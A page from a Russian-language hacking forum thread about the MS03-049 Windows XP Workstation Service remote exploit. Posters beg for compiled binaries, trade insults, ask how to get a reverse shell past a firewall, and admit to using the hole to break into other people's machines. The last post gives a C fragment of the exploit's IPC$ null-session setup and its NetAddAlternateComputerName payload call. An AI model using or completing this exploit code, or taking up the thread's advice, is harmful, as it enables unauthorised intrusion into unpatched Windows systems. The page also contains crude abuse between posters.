Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: Пред. 1 ... 4 5 6 7 8 ... 11 След.
RSS
Microsoft Windows XP Workstation Service Remote Exploit (MS03-049)
 
Цитата
Shanker пишет:
Может, поделишься?
да возьми дельфи и нарисуй там работы на 15 мин
 
Цитата
Virtual пишет:

да возьми дельфи и нарисуй там работы на 15 мин

Если б я знал Дельфи (вернее, Паскаль)... Я же ни один язык не знаю... пока  [IMG]http://www.securitylab.ru/forum/smileys/smiley6.gif[/IMG]
Может, всё-таки поделишься[IMG]http://www.securitylab.ru/forum/smileys/smiley25.gif[/IMG]
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
подскажите мне как с netapi32 справится, и я Вам на асме интерфейс нарисую :}
 
Мдя...
такое ощущение что собралась кучка собаченок и смотрят голодными глазами на косточку - когда ж ее бросят.
Нихочу никого обижать, но все те, кто просит выслать exe на мыло - это люди не из тех "хакеров", которые  всем друзьям рассказывают как они пентагоны ломают, локалхосты рутят и все ламо мастдай а тут так скромненько - ну дайте, ну вышлите.. - стыдно ребята должно быть
 
To:skyx

Пашёл на  *  лох ебаный. [IMG]http://www.securitylab.ru/forum/smileys/smiley7.gif[/IMG] [IMG]http://www.securitylab.ru/forum/smileys/smiley7.gif[/IMG] [IMG]http://www.securitylab.ru/forum/smileys/smiley7.gif[/IMG] [IMG]http://www.securitylab.ru/forum/smileys/smiley7.gif[/IMG] [IMG]http://www.securitylab.ru/forum/smileys/smiley7.gif[/IMG] <font color=RED></font><font size="6"></font><font face="Times New Roman, Times, serif"></font>
 
JUST UPLOAD THE COMPILE Exploit FFS
 
skyx наверное прав...
> Пашёл на  *  лох ебаный.
- И что ото значит?.. ты знаеш кто он? что он из сбея представляет?.. тогда молчи! я бы твою мессагу перевёл бы на тебя!.. и тут врядли кто поспорит
 
[SIZE=50]lol</font>
 
в паблике уже ледит универсальный спл для сп0 и сп1(шеллкод обходит грабли с WidestringToMultibyte() в сп0) а они все просят, хакиры йопт 0_0

               ,       ;  ,
              /(      &nbs p; )`
              \\ \\___ / |
              /- _  `-/  '
             (/\\/ \\ \\ /\\
             / /   | `    \\
             O O   ) /    |
             `-^--'`<     '
            (_.)  _  )   /
             `.___/`    /
               `-----'  /
<----.     __ / __   \\
<----|====O)))==) \\) /====
<----'    `--' `.__,' \\
               |       ;  |
                 \\       /  &nb sp;    /\\
           ______( (_  / \\______/
        ,'  ,-----'   |
        `--{__________)
 
* , какая-то сука прокололась и выложила. ну терь эту дыру совсем скоро покроют все.
 
и где же это он лежит?
 
Цитата
Гость пишет:
 * , какая-то сука прокололась и выложила. ну терь эту дыру совсем скоро покроют все.
И что? Это плохо? А потом на нас катят бочку, мол скрипткидди - мы! [IMG]http://www.securitylab.ru/forum/smileys/smiley7.gif[/IMG]
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
Чего хорошего в том, что эксплойт станет общедоступным то?? Как раз тупые вонючие скрипткидди, которые даже компилировать не умеют, станут играть с эксплоитом.  Такая массовость подстегнет всех и вся закрыть
дыру, установив патчи. Это лишит меня возможности получать доступ к другим. И это плохо.

P.S: Я не говорю, что если человек поставил lcc, исправил пару ошибок в коде, создал netapi32.lib и собрал, он кулхакер. Конечно не так это, но он все-таки далек от огромной массы явных скрипт-кидди.
 
Shanker
Сплоит не только для сбора ботнета для проведения DDoS или других киддис-акций может применяться - есть, например, такие понятия как socks и socks chain...
 
2 root и другим: ну не зна, я его откомпилил, но он с ошибкой вываливает, когда ип ввожу - разбираться не хочу..., поэтому и прошу на straus@list.ru скинуть хотя бы проект, чтобы сравнить, где я не прав(в замен, что я не обманываю, вышлю свой проект, который компилится и там не вырезано ничего). Я, как и говорил, занимаюсь другими вещами... например, по Фролову сеть разбираю и начинаю ваять свой троян... а вообще графикой. Так что от большинства я кое-чем все же отличаюсь. ГЫ
 
Кто-нить кто откомпилил уже помогите.. Вобщем скачал эксполит сделал все необходимые изменения, разобрался с несуществующими функциями.. Откомпилировал.. Запускаю типа.. ms0349.exe -h 192.168.26.5 -t4 подключается к ipc всё пучком запускает netapi32.dll и .. Вылетает svchost со всеми запущеными процессами под ним.. Но ошибки типа перезагрузка через 60 сек нет.. Ладно запускаю все процессы заново (благо CMD замутил по бырому), опять пробую.. Нифига.. Ладно притащил папин комп подрубил сетку.. Пробую удалённо.. Вылетают удалённо все процессы тоже без 60 сек... (есть конечно сетка но там я не буду пробовать, никто не выделжит 3 часового издевательства над компом..).. пишите на // machfett@nm.ru // ps Система Windows XP SP1 Russian ws заплатка от kaht2 .. + куча отрубленых процессов на том и другом компе, но это я думаю не из-за этого (есесно lanmanworkstation работает) .\/.
 
Такая ситуация.На целевом компе стоит файрволл, который повидимому отрубает входящие коннекты к портам.От баги не пропатчен, но шелл не открывается.Кто нибудь знает как это можно обойти(слышал про inverse shell или чёта подобное)...
 
Скомпилил... Работает, когда я экплою локальную машину, но не хочет эксплоить машины в интернете. Так че этот эксплоит, получается, только в локальной сети работает что-ли?
 
Кто-нибудь юзал http://packetstorm.linuxsecurity.com/0312-exploits/qwks.cpp
 
Цитата
mafet-X пишет:
Кто-нить кто откомпилил уже помогите.. Вобщем скачал эксполит сделал все необходимые изменения, разобрался с несуществующими функциями.. Откомпилировал.. Запускаю типа.. ms0349.exe -h 192.168.26.5 -t4 подключается к ipc всё пучком запускает netapi32.dll и .. Вылетает svchost со всеми запущеными процессами под ним.. Но ошибки типа перезагрузка через 60 сек нет.. Ладно запускаю все процессы заново (благо CMD замутил по бырому), опять пробую.. Нифига.. Ладно притащил папин комп подрубил сетку.. Пробую удалённо.. Вылетают удалённо все процессы тоже без 60 сек... (есть конечно сетка но там я не буду пробовать, никто не выделжит 3 часового издевательства над компом..).. пишите на // machfett@nm.ru // ps Система Windows XP SP1 Russian ws заплатка от kaht2 .. + куча отрубленых процессов на том и другом компе, но это я думаю не из-за этого (есесно lanmanworkstation работает) .\/.


не поделишся, как с netapi32.dll ?
тоесть я тут всё пробовал всякие варианты.. вставлял:

typedef int (WINAPI * ADDALTCN) (wchar_t*, wchar_t*, void*, void*, long);

HINSTANCE hNetApi;
ADDALTCN fnNetAdd = NULL;

char szNetApi[] = "netapi32.dll";
char szNetAdd[] = "NetAddAlternateComputerName";
// ------------------------------------------------
//void NetAddAlternateComputerName(wchar_t *Server, wchar_t *AlternateName, wchar_t * DomainAccount,
//         &nbs p;         &nbs p;wchar_t *DomainAccountPassword, unsigned int Reserved);

void send_exp(void* dump) {
     NETRESOURCE _IPC_;

     _IPC_.lpLocalName = NULL;
     _IPC_.lpProvider = NULL;
     _IPC_.dwType = RESOURCETYPE_ANY;
     _IPC_.lpRemoteName = (char*)&ipc;
     printf("[+] Setting up IPC$ session...\n");
     if (WNetAddConnection2(&_IPC_,"","",0)!=ERROR_SUCCESS) {
            printf("[x] Couldn't establish IPC$ connection.\n");
            exit (1);
     }
     printf("[*] IPC$ session setup successfully!\n");
     printf("[+] Sending exploit ...\n");
printf("[+] loading '%s' library...\n", szNetApi);
     hNetApi = LoadLibrary(szNetApi);
     if (hNetApi == NULL)
     {
            printf("[-] '%s' not loaded\n", szNetApi);
            //return 1;
     }
     printf("[+] loaded at %p\n", hNetApi);

     printf("[+] locating '%s' function...\n", szNetAdd);
     fnNetAdd = (ADDALTCN) GetProcAddress(hNetApi, szNetAdd);
     if (fnNetAdd == NULL)
     {
            printf("[-] '%s' not found\n", szNetAdd);
            //return 1;
     }
     printf("[+] located at %p\n", fnNetAdd);

     //printf("[+] connecting to '%s'...\n", hostname);
     int stat = fnNetAdd(tgt_net_uni, expl_uni ,NULL,NULL,0);
     printf("[+] sent (status: %d)\n", stat);
     //NetAddAlternateComputerName( );
     //NetAddAlternateComputerName( );
     // ka-a-a b0-0-0-ms //
}


Я понимаю что заеженная тема..., но серавно не прёт... :{

теперь ругается на RECVTIMEOUT.
Страницы: Пред. 1 ... 4 5 6 7 8 ... 11 След.
Читают тему (гостей: 6)